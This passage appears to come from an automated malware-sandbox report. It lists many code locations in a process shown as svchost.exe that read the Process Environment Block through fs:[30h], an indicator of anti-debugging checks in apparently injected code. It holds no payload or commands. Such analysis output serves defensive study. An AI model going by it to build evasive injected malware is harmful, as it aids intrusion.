                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]2_2_0302C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]2_2_030C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]2_2_03070185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]2_2_030C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]2_2_030AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]2_2_03030750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]2_2_030BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]2_2_030B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]2_2_03038770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]2_2_030D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]2_2_030307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]2_2_0303C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]2_2_030B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]2_2_030BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]2_2_030AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]2_2_03072619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]2_2_0304E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]2_2_03066620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]2_2_03068620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]2_2_0303262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]2_2_0304C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]2_2_03062674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]2_2_0306C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]2_2_030666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]2_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]2_2_030C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]2_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]2_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]2_2_03064588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]2_2_0306E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]2_2_030365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]2_2_030325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]2_2_0302C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]2_2_0306A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]2_2_0302645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]2_2_0305245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]2_2_030BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]2_2_030364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]2_2_030644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]2_2_030BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]2_2_030304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
